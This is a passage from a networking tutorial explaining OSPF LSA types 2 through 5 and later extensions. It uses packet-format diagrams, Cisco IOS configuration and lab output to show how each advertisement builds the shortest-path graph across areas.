        0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |            LS age             |      Options  |      2        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                        Link State ID                          |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                     Advertising Router                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                     LS sequence number                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |         LS checksum           |             length            |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                         Network Mask                          |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                        Attached Router                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                              ...                              |

LSA2 should contain the missing pieces of the puzzle: a list of connected RIDs and the network mask.

R2#show ip ospf database network

            OSPF Router with ID (2.2.2.2) (Process ID 1)

                Net Link States (Area 0)

  Routing Bit Set on this LSA in topology Base with MTID 0
  LS age: 459
  Options: (No TOS-capability, DC)
  LS Type: Network Links
  Link State ID: 192.168.234.4 (address of Designated Router)
  Advertising Router: 4.4.4.4
  LS Seq Number: 80000002
  Checksum: 0xEEB9
  Length: 36
  Network Mask: /24
        Attached Router: 4.4.4.4
        Attached Router: 2.2.2.2
        Attached Router: 3.3.3.3

Now we have all the information needed to extend the graph using transit segment:

Figure 5. LSA2 added

A few things are worth mentioning here. First is zero egress cost from the pseudo-node, it does not introduce any penalty to path calculation. Second, subnet information is embedded in LSA2: mask is listed explicitly and network itself can be derived using LSID and the prefix length.

As a side note, OSPF prefix suppression should become quite obvious now:

  1. it eliminates stub link types on point-to-point adjacencies;
  2. it assigns /32 mask to LSA2 as a special indicator to ignore the subnet; the worst-case scenario – DR IP address would be reachable but not the whole subnet.

Using LSA1 and LSA2 data structures, it’s possible to create a graph that describes the whole OSPF area. However, there is also a notion of external prefixes and several areas in OSPF – that’s where we’re headed next.

LSA5: AS-external LSA

This LSA is pretty straightforward: it announces an external subnet, mask and a few knobs to make life easier (no). The format is shown below:

        0                   1                   2                   3
        0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |            LS age             |     Options   |      5        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                        Link State ID                          |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                     Advertising Router                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                     LS sequence number                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |         LS checksum           |             length            |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                         Network Mask                          |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |E|     0       |                  metric                       |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                      Forwarding address                       |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                      External Route Tag                       |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |E|    TOS      |                TOS  metric                    |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                      Forwarding address                       |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                      External Route Tag                       |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                              ...                              |

LSID is equal to network number, mask and metric are listed explicitly… Everything is there to build a vertex and corresponding edges, pretty much like stub networks in LSA1. If you want to know more about Forwarding address (FA), check out this blog and links for a series dedicated to LSA5 FA and its effects, although sometimes they might prove somewhat useful. For the rest of the data, RFC 2338 section A.4.5 is more than enough.

In our topology R3 is the one to generate LSA5 with loopback redistribution:

R3(config)#router ospf 1
R3(config-router)#redistribute connected subnets
R3#
R3#show ip ospf database

            OSPF Router with ID (3.3.3.3) (Process ID 1)

                Router Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum Link count
1.1.1.1         1.1.1.1         441         0x80000025 0x00A449 3
2.2.2.2         2.2.2.2         962         0x80000011 0x00460D 3
3.3.3.3         3.3.3.3         23          0x80000009 0x003A27 1
4.4.4.4         4.4.4.4         1085        0x8000000A 0x00F365 1

                Net Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
192.168.234.4   4.4.4.4         835         0x80000004 0x00EABB

                Type-5 AS External Link States

Link ID         ADV Router      Age         Seq#       Checksum Tag
3.3.3.3         3.3.3.3         2           0x80000001 0x000385 0
R3#
R3#show ip ospf database external

            OSPF Router with ID (3.3.3.3) (Process ID 1)

                Type-5 AS External Link States

  LS age: 38
  Options: (No TOS-capability, DC, Upward)
  LS Type: AS External Link
  Link State ID: 3.3.3.3 (External Network Number )
  Advertising Router: 3.3.3.3
  LS Seq Number: 80000001
  Checksum: 0x385
  Length: 36
  Network Mask: /32
        Metric Type: 2 (Larger than any link state path)
        MTID: 0
        Metric: 20
        Forward Address: 0.0.0.0
        External Route Tag: 0

Keep in mind that LSA5 is flooded within the whole AS, not just OSPF area. In order to build the graph further, we need a vertex (LSA5 LSID) and an edge (Advertising Router) along with its weight:

Figure 6. LSA5 added

That’s it for LSA5 role in the graph. Almost.

LSA3: summary LSA

Let’s switch to inter-area communication for a moment. Beware of the first thought: this LSA is not intended for prefix summarization in the usual sense. It is used to summarize topology information from another area: LSA1 and LSA2, used for building a graph, are not transferred between areas but morphed into LSA3 based on LSDB or RIB contents (more on that later). LSA3 format is shown below:

        0                   1                   2                   3
        0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |            LS age             |     Options   |       3       |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                        Link State ID                          |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                     Advertising Router                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                     LS sequence number                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |         LS checksum           |             length            |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                         Network Mask                          |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |      0        |                  metric                       |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |     TOS       |                TOS  metric                    |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                              ...                              |

The idea is pretty much the same as with LSA5: transfer network (LSA3 LSID), mask and corresponding metric to another area. In order to conserve computing resources of the routers and thus make OSPF AS more scalable, there is no topology information exchanged between areas and multi-area OSPF acts as a distance-vector (DV) routing protocol. This is the reason why some authors call this IGP a hybrid one (EIGRP is a pure DV IGP although quite advanced). DV logic usually requires some loop prevention mechanism like split-horizon, DUAL and so on. OSPF, however, employs a completely different logic: LSA3 can cross an area border only when one of the areas is area 0 aka backbone area. This concept allows creation of a small tree: area 0 is the root while all other areas are on the same level below area 0. It is obvious that no routing loops can occur between areas in such a setup as there is always only a single path available – through backbone.

Let’s configure area 1, including R4 and R5:

R4(config)#interface f0/1
R4(config-if)#ip ospf 1 area 1
R4(config-if)#ip ospf network point-to-point
R5(config)#router ospf 1
R5(config-router)#router-id 5.5.5.5
R5(config)#intreface f0/1
R5(config-if)#ip ospf 1 area 1
R5(config-if)#ip ospf network point-to-point
R5(config)#interface lo 1
R5(config-if)#ip address 5.5.5.5 255.255.255.255
R5(config-if)#ip ospf 1 area 1
R5(config)#interface lo 2
R5(config-if)#ip address 5.5.5.55 255.255.255.255
R5(config-if)#ip ospf 1 area 1
R2#show ip ospf database

            OSPF Router with ID (2.2.2.2) (Process ID 1)

                Router Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum Link count
1.1.1.1         1.1.1.1         782         0x80000027 0x00A04B 3
2.2.2.2         2.2.2.2         1339        0x80000013 0x00420F 3
3.3.3.3         3.3.3.3         422         0x8000000B 0x003629 1
4.4.4.4         4.4.4.4         252         0x8000000D 0x00F064 1

                Net Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
192.168.234.4   4.4.4.4         1235        0x80000006 0x00E6BD

                Summary Net Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
5.5.5.5         4.4.4.4         170         0x80000001 0x003ED8
5.5.5.55        4.4.4.4         156         0x80000001 0x00489C
192.168.45.0    4.4.4.4         242         0x80000001 0x00781D

                Type-5 AS External Link States

Link ID         ADV Router      Age         Seq#       Checksum Tag
3.3.3.3         3.3.3.3         422         0x80000003 0x00FE87 0

As expected, prefixes from area 1 are seen through LSA3. R4, being an ABR, is listed as an advertising router. From backbone point of view, all these prefixes are directly connected to R4 thus maintaining area 1 topology concealment.

R2#show ip ospf database summary adv-router 4.4.4.4

            OSPF Router with ID (2.2.2.2) (Process ID 1)

                Summary Net Link States (Area 0)

  Routing Bit Set on this LSA in topology Base with MTID 0
  LS age: 823
  Options: (No TOS-capability, DC, Upward)
  LS Type: Summary Links(Network)
  Link State ID: 5.5.5.5 (summary Network Number)
  Advertising Router: 4.4.4.4
  LS Seq Number: 80000001
  Checksum: 0x3ED8
  Length: 28
  Network Mask: /32
        MTID: 0         Metric: 2

  Routing Bit Set on this LSA in topology Base with MTID 0
  LS age: 809
  Options: (No TOS-capability, DC, Upward)
  LS Type: Summary Links(Network)
  Link State ID: 5.5.5.55 (summary Network Number)
  Advertising Router: 4.4.4.4
  LS Seq Number: 80000001
  Checksum: 0x489C
  Length: 28
  Network Mask: /32
        MTID: 0         Metric: 2

  Routing Bit Set on this LSA in topology Base with MTID 0
  LS age: 895
  Options: (No TOS-capability, DC, Upward)
  LS Type: Summary Links(Network)
  Link State ID: 192.168.45.0 (summary Network Number)
  Advertising Router: 4.4.4.4
  LS Seq Number: 80000001
  Checksum: 0x781D
  Length: 28
  Network Mask: /24
        MTID: 0         Metric: 1

We have enough experience now to reconstruct area 1 graph from its LSDB so the focus for the rest of the article would be area 0 point of view on OSPF AS.

Figure 7. LSA3 added

The only thing left to verify is the trigger for LSA3 generation. Let’s filter 5.5.5.55/32 from R4 RIB and see if it is propagated into area 0 while not being present in routing table.

R4(config)#ip prefix-list FILTER deny 5.5.5.55/32
R4(config)#ip prefix-list FILTER permit 0.0.0.0/0 le 32
R4(config)#router ospf 1
R4(config-router)#distribute-list prefix FILTER in
R4#
R4# show ip route ospf
<output omitted>

      1.0.0.0/32 is subnetted, 1 subnets
O        1.1.1.1 [110/3] via 192.168.234.2, 00:00:05, FastEthernet0/0
      3.0.0.0/32 is subnetted, 1 subnets
O E2     3.3.3.3 [110/20] via 192.168.234.3, 00:00:05, FastEthernet0/0
      5.0.0.0/32 is subnetted, 1 subnets
O        5.5.5.5 [110/2] via 192.168.45.5, 00:00:05, FastEthernet0/1
O     192.168.12.0/24 [110/2] via 192.168.234.2, 00:00:05, FastEthernet0/0
R2#show ip ospf database

            OSPF Router with ID (2.2.2.2) (Process ID 1)

                Router Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum Link count
1.1.1.1         1.1.1.1         228         0x80000028 0x009E4C 3
2.2.2.2         2.2.2.2         804         0x80000014 0x004010 3
3.3.3.3         3.3.3.3         1868        0x8000000B 0x003629 1
4.4.4.4         4.4.4.4         1697        0x8000000D 0x00F064 1

                Net Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
192.168.234.4   4.4.4.4         653         0x80000007 0x00E4BE

                Summary Net Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
5.5.5.5         4.4.4.4         1615        0x80000001 0x003ED8
5.5.5.55        4.4.4.4         1602        0x80000001 0x00489C
192.168.45.0    4.4.4.4         1688        0x80000001 0x00781D

                Type-5 AS External Link States

Link ID         ADV Router      Age         Seq#       Checksum Tag
3.3.3.3         3.3.3.3         1868        0x80000003 0x00FE87 0
R2#
R2#show ip route ospf
<output omitted>

      1.0.0.0/32 is subnetted, 1 subnets
O        1.1.1.1 [110/2] via 192.168.12.1, 06:10:34, FastEthernet0/1
      3.0.0.0/32 is subnetted, 1 subnets
O E2     3.3.3.3 [110/20] via 192.168.234.3, 01:37:25, FastEthernet0/0
      5.0.0.0/32 is subnetted, 2 subnets
O IA     5.5.5.5 [110/3] via 192.168.234.4, 00:26:58, FastEthernet0/0
O IA     5.5.5.55 [110/3] via 192.168.234.4, 00:26:44, FastEthernet0/0
O IA  192.168.45.0/24 [110/2] via 192.168.234.4, 00:28:10, FastEthernet0/0

According to RFC 2328 section 12.4.3, LSA3 routes are “determined by examining the routing table structure”. However, filtering 5.5.5.55/32 from the RIB does not prevent R4 (IOS) from generating a corresponding LSA3 into backbone area. Unlike DV IGPs, OSPF is not designed for RIB filtering at an arbitrary point of network that’s why using such a knob is generally not a good idea.

LSA4: ASBR-summary LSA

As you might have already guessed, LSA4 summarizes topology information about ASBRs. Remember that LSA5 propagate throughout the whole AS? An LSA can be changed only by its owner to ensure LSDB consistency across an area. There is also no vertex to anchor to if ASBR is located in a different area since Advertising Router ID would be unknown. LSA4 mission is to fix such a misfortune. It has the same layout as LSA3:

        0                   1                   2                   3
        0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |            LS age             |     Options   |       4       |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                        Link State ID                          |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                     Advertising Router                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                     LS sequence number                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |         LS checksum           |             length            |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                         Network Mask                          |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |      0        |                  metric                       |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |     TOS       |                TOS  metric                    |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                              ...                              |

The difference is in LSID meaning: while LSA3 lists the network number in this field, LSA4 places ASBR RID there. Let’s generate some LSA5 in area 1 and see what effect it has on backbone area.

R5(config)#router ospf 1
R5(config-router)#redistribute connected subnets
R2#show ip ospf database

            OSPF Router with ID (2.2.2.2) (Process ID 1)

                Router Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum Link count
1.1.1.1         1.1.1.1         1561        0x80000028 0x009E4C 3
2.2.2.2         2.2.2.2         112         0x80000015 0x003E11 3
3.3.3.3         3.3.3.3         1180        0x8000000C 0x00342A 1
4.4.4.4         4.4.4.4         1221        0x8000000E 0x00EE65 1

                Net Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
192.168.234.4   4.4.4.4         1986        0x80000007 0x00E4BE

                Summary Net Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
5.5.5.5         4.4.4.4         960         0x80000002 0x003CD9
5.5.5.55        4.4.4.4         960         0x80000002 0x00469D
192.168.45.0    4.4.4.4         960         0x80000002 0x00761E

                Summary ASB Link States (Area 0)

Link ID         ADV Router      Age         Seq#       Checksum
5.5.5.5         4.4.4.4         10          0x80000001 0x0026F0

                Type-5 AS External Link States

Link ID         ADV Router      Age         Seq#       Checksum Tag
3.3.3.3         3.3.3.3         1180        0x80000004 0x00FC88 0
6.6.6.6         5.5.5.5         16          0x80000001 0x00E997 0

LSA4 are generated only by ABRs when the latter transfers LSA5 from one area to another. In our case, 6.6.6.6/32 triggers R4 to create LSA4 for R5.

R2#show ip ospf database asbr-summary

            OSPF Router with ID (2.2.2.2) (Process ID 1)

                Summary ASB Link States (Area 0)

  Routing Bit Set on this LSA in topology Base with MTID 0
  LS age: 144
  Options: (No TOS-capability, DC, Upward)
  LS Type: Summary Links(AS Boundary Router)
  Link State ID: 5.5.5.5 (AS Boundary Router address)
  Advertising Router: 4.4.4.4
  LS Seq Number: 80000001
  Checksum: 0x26F0
  Length: 28
  Network Mask: /0
        MTID: 0         Metric: 1

Besides ASBR ID, LSA4 also carries the metric to reach ASBR from ABR perspective. Now the node, that can be considered an owner of LSA5 prefix within the area, can be easily established, thus closing the last gap in extending the graph across AS.

Figure 8. LSA4 added

LSA 6, 7 and beyond

There are also a few LSA types left that we did not previously cover. In this section I would like to briefly look through them. Some of these LSAs represent gradual modifications to the original algorithm; however, the changes are not drastic, although being a topic of their own, that’s why detailed description of these LSAs are out of scope of this article.

LSA6 was allocated for multicast OSPF extension which has been obsolete for a very long time.

LSA7 is a knob to allow external prefixes to be injected into stub areas, turning them into so called not-so-stubby areas or NSSA. If FA in LSA5 gave you creeps, LSA7 would make your hair stand on end.

LSA8 was aimed to expand LSA5 via additional attributes but it didn’t make it out of the draft.

LSA9 (link-local), 10 (area-local) and 11 (AS-local) are called opaque LSAs. They are designed to carry arbitrary information; these LSAs are extensively used for calculating MPLS TE tunnels via constrained SFP (CSPF).

Kudos for review: Anastasiia Kuraleva

Follow on Telegram, LinkedIn